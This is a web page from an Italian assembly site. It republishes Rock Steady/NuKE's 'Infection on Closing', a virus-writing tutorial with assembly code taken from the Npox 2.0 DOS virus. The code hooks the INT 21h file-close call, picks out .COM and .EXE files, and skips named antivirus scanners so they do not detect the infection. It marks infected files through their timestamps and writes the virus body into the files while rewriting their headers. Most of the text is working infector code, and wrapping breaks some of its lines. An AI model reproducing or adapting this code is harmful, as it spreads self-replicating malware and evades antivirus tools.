programmers resources
  http://www.intel-assembler.it/  (c)2017 intel-assembler.it   info@intel-assembler.it
 
Search :  
Lingua Italiana    English Language   
Index
 
just an empty assembly space
just an arrow Intel Platform
just an arrow Article & Guides
just an arrow Download Software


23/01/2009 Featured Article: How to remove Buzus Virus (permalink)




:::3277483:::
Bottone Scambio Directory Pubblicitaonline.it
Home Page | Articles & Guides | Download | Intel Platform | Contacts

Google
 


Bookmark and Share
Download 
Tell a friend



Infection on Closing

Come facevano i virus ad diffondersi

(by rock steady)

Vi siete mai chiesti come facevano i virus a propagarsi ? Qui č mostrata la tecnica di riproduzione del tipo "onClosingFile" cioč agganciando l'interrupt 21 e modificando la funzione di chiusura file.
This article is online from 5102 days and has been seen 3391 times



                        ****************************              
            
                        **  Infection on Closing  **              
            
                        **                        **              
            
                        **  By Rock Steady/NuKE   **              
            
                        ****************************              
            

This routine goes out for a few people that had trouble hacking th
is          
routine themselves... I kinda like it, its my very OWN, no Dark Av
enger       
hack, it is VERY straight forward, and kinda simple...I was not go
ing         
to put this here, but since I `Promised' people and left them hang
ing         
with `Wait for IJ#5, I guess I owed you it... huh?'               
            
                                                                  
            
Again this code comes right out of Npox 2.0, its need, simple fast
,           
cool, and it works, Npox is your example, I heard MANY MANY compla
ints        
with other `Virus writing guides' Meaning they explained the code 
but         
sometimes the arthur himself never check if the code was good, as 
he          
may have modified it, and not test it... or whatever reason... Any
how         
                                                                  
            
------------------                                                
            
Okay once you intercepted the Int21h/ah=3Dh function you make it j
ump         
here...                                               
                                                                  
            
closing_file:   cmp     bx,0h                   ;Handle=0?        
            
                je      closing_bye             ;if equal leave   
            
                cmp     bx,4h                   ;Handle > 4    
               
                ja      close_cont              ;if YES ,then JUMP
!           
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interes
t to us     
                                                                  
            
The whole point of the above code is that DOS contains 5 predefine
d           
Handlers, 0 -> 4, Basically, those handles are the NULL, CON, A
UX             
COMx, LPTx handles... So we surely do not need to continue once we
            
encounter that...                                                 
            
                                                                  
            
close_cont:     push    ax                                        
            
                push    bx                                        
            
                push    cx                                        
            
                push    dx                                        
            
                push    di                                        
            
                push    ds                                        
            
                push    es                                        
            
                push    bp                                        
            
                                                                  
            
Our biggest problem is how do we know if this file is a .COM or .E
XE or       
simply just another dumb data file? We need this info before we ca
n           
try to infect it... We do this by getting DOS's "Lists of List" th
is          
will give us all INFO need on the File Handle Number we have in BX
!           
and we do that like so...                                         
            
                                                                  
            
                push    bx                      ;Save File Handle 
            
                mov     ax,1220h                ;Get the Job File 
Table       
                int     2fh                     ;(JFT)            
            
                                                                  
            
This will give us the JFT for the CURRENT File handle in BX, which
            
is given thru ES:DI Then we use this information to get the Addres
s of        
the System File Table!                                            
            
                                                                  
            
                mov     ax,1216h        ;Get System File Table (Li
st)         
                mov     bl,es:[di]      ;system file table entry n
umber       
                int     2fh                                       
            
                pop     bx              ;restore the Handle       
            
                                                                  
            
                add     di,0011h                                  
            
                mov     byte ptr es:[di-0fh],02h                  
            
                                                                  
            
                add     di,0017h                ;Jump to the ASCII
Z string    
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file
?           
                jne     closing_next_try        ;Next cmp...      
            
                cmp     byte ptr es:[di+2h],'M'                   
            
                jne     pre_exit                ;Nope exit        
            
                jmp     closing_cunt3           ;.COM file continu
e           
                                                                  
            
closing_next_try:                                                 
            
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file
?           
                jne     pre_exit                ;No, exit         
            
                cmp     byte ptr es:[di+2h],'E'                   
            
                jne     pre_exit                ;No, exit         
            
                                                                  
            
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT w
hen         
started up, Opens itself, closes itself, etc... So that a dumb    
            
virus will infect it, and then the CRC value changes and F-PROT   
            
screams... haha... Fuck-Prot! is the name...                      
            
                                                                  
            
closing_cunt:   cmp     word ptr es:[di-8],'CS'                   
            
                jnz     closing_cunt1              ;SCAN          
            
                cmp     word ptr es:[di-6],'NA'                   
            
                jz      pre_exit                                  
            
                                                                  
            
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                   
            
                jnz     closing_cunt2              ;F-PROT        
            
                cmp     word ptr es:[di-6],'RP'                   
            
                jz      pre_exit                                  
            
                                                                  
            
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                   
            
                jnz     closing_cunt3                             
            
                cmp     word ptr es:[di-6],'AE'    ;CLEAN         
            
                jnz     closing_cunt3                             
            
                                                                  
            
pre_exit:       jmp     closing_nogood                            
            
                                                                  
            
The REST is pretty much the EXACT same on `how' you'd infect a nor
mal         
file, I'll leave it for you to go thru it... The hardest part is  
            
OVER! Only trick part is, the ending... Remember to Close the file
            
and then do an IRET, you don't leave control to dos, as you only n
eeded       
to close it, so do it... OR DON'T close it and return to DOS, as d
os          
will close it, just DON'T CLOSE IT TWICE!!!!                      
            
                                                                  
            
closing_cunt3:  mov     ax,5700h                        ;Get file 
Time        
                call    calldos21                                 
            
                mov     al,cl                                     
            
                or      cl,1fh                                    
            
                dec     cx                              ;60 Second
s           
                xor     al,cl                                     
            
                jz      closing_nogood                  ;Already i
nfected     
                                                                  
            
                push    cs                                        
            
                pop     ds                                        
            
                mov     word ptr ds:[old_time],cx       ;Save time
            
                mov     word ptr ds:[old_date],dx                 
            
                                                                  
            
                mov     ax,4200h                        ;jmp begin
ning of     
                xor     cx,cx                           ;file...  
            
                xor     dx,dx                                     
            
                call    calldos21                                 
            
                                                                  
            
                mov     ah,3fh                          ;Get first
 1b byte    
                mov     cx,1Bh                                    
            
                mov     dx,offset buffer                          
            
                call    calldos21                                 
            
                                                                  
            
                jc      closing_no_good                 ;error?   
            
                mov     ax,4202h                        ;Jmp to th
e EOF       
                xor     cx,cx                                     
            
                xor     dx,dx                                     
            
                call    calldos21                                 
            
                                                                  
            
                jc      closing_no_good                           
            
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file
?           
                je      closing_exe                     ;Yupe then
 jmp        
                mov     cx,ax                                     
            
                sub     cx,3h                                     
            
                mov     word ptr ds:[jump_address+1],cx  ;Figure o
ut the      
                call    infect_me                        ;jmp for 
.com        
                                                                  
            
                jc      closing_no_good                           
            
                mov     ah,40h                          ;Write it 
to file     
                mov     dx,offset jump_address                    
            
                mov     cx,3h                                     
            
                call    calldos21                                 
            
closing_no_good:                                                  
            
                mov     cx,word ptr ds:[old_time]       ;Save file
 time       
                mov     dx,word ptr ds:[old_date]       ;& date   
            
                mov     ax,5701h                                  
            
                call    calldos21                                 
            
                                                                  
            
closing_nogood: pop     bp                                        
            
                pop     es                                        
            
                pop     ds                                        
            
                pop     di                                        
            
                pop     dx                                        
            
                pop     cx                                        
            
                pop     bx                                        
            
                pop     ax                                        
            
                jmp     dword ptr cs:[int21]                      
            
                                                                  
            
AS you see the above, we DIDN'T close the file, so we leave dos to
 do it.     
The bottom is for infecting .exes...                              
            
                                                                  
            
closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the 
original    
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & S
S:SP        
                mov     cx,word ptr cs:[buffer+22]                
            
                mov     word ptr cs:[exe_cs],cx                   
            
                mov     cx,word ptr cs:[buffer+16]                
            
                mov     word ptr cs:[exe_sp],cx                   
            
                mov     cx,word ptr cs:[buffer+14]                
            
                mov     word ptr cs:[exe_ss],cx                   
            
                                                                  
            
                push    ax                                        
            
                push    dx                                        
            
                call    multiply                                  
            
                sub     dx,word ptr cs:[buffer+8]                 
            
                mov     word ptr cs:[vir_cs],dx                   
            
                push    ax                                        
            
                push    dx                                        
            
                call    infect_me                                 
            
                pop     dx                                        
            
                pop     ax                                        
            
                mov     word ptr cs:[buffer+22],dx                
            
                mov     word ptr cs:[buffer+20],ax                
            
                pop     dx                                        
            
                pop     ax                                        
            
                jc      closing_no_good                           
            
                                                                  
            
                add     ax,virus_size                             
            
                adc     dx,0                                      
            
                                                                  
            
                push    ax                                        
            
                push    dx                                        
            
                call    multiply                                  
            
                sub     dx,word ptr cs:[buffer+8]                 
            
                add     ax,40h                                    
            
                mov     word ptr cs:[buffer+14],dx                
            
                mov     word ptr cs:[buffer+16],ax                
            
                pop     dx                                        
            
                pop     ax                                        
            
                                                                  
            
                push    bx                                        
            
                push    cx                                        
            
                mov     cl,7                                      
            
                shl     dx,cl                                     
            
                                                                  
            
                mov     bx,ax                                     
            
                mov     cl,9                                      
            
                shr     bx,cl                                     
            
                                                                  
            
                add     dx,bx                                     
            
                and     ax,1FFh                                   
            
                jz      close_split                               
            
                inc     dx                                        
            
close_split:    pop     cx                                        
            
                pop     bx                                        
            
                                                                  
            
                mov     word ptr cs:[buffer+2],ax                 
            
                mov     word ptr cs:[buffer+4],dx                 
            
                                                                  
            
                mov     ah,40h                                    
            
                mov     dx,offset ds:[buffer]                     
            
                mov     cx,20h                                    
            
                call    calldos21                                 
            
                                                                  
            
closing_over:   jmp     closing_no_good                           
            
                                                                  
            
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
*-*-*-*-    
;                   Infection Routine...                          
            
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
*-*-*-*-    
infect_me       proc                                              
            
                mov     ah,40h                                    
            
                mov     dx,offset init_virus                      
            
                mov     cx,virus_size                             
            
                call    calldos21                                 
            
                                                                  
            
                jc      exit_error                      ;Error Spl
it          
                mov     ax,4200h                                  
            
                xor     cx,cx                           ;Pointer b
ack to      
                xor     dx,dx                           ;Top of fi
le!         
                call    calldos21                                 
            
                                                                  
            
                jc      exit_error                      ;Split Dud
e...        
                clc                                     ;Clear car
ry flag     
                ret                                               
            
exit_error:                                                       
            
                stc                                     ;Set carry
 flag       
                ret                                               
            
infect_me       endp                                              
            






Top
Download 
Tell a friend
Bookmark and Share



Similar Articles

Anti 1539
Antivirus con codice sorgente Basic
(by JES)

Junkie Virus
Il codice sorgente commentato del Junkie
(by Dark Angel)

Wordmacro Viruses
Can you remember old Word Macro Viruses ?
(by b0z0)

 Tags: virus


webmaster jes
writers rguru, tech-g, aiguru, drAx

site optimized for IE/Firefox/Chrome with 1024x768 resolution

Valid HTML 4.01 Transitional


ALL TRADEMARKS ® ARE PROPERTY OF LEGITTIMATE OWNERS.
© ALL RIGHTS RESERVED.

hosting&web - www.accademia3.it

grossocactus
find rguru on
http://www.twitter.com/sicurezza3/
... send an email ...
Your name

Destination email

Message

captcha! Code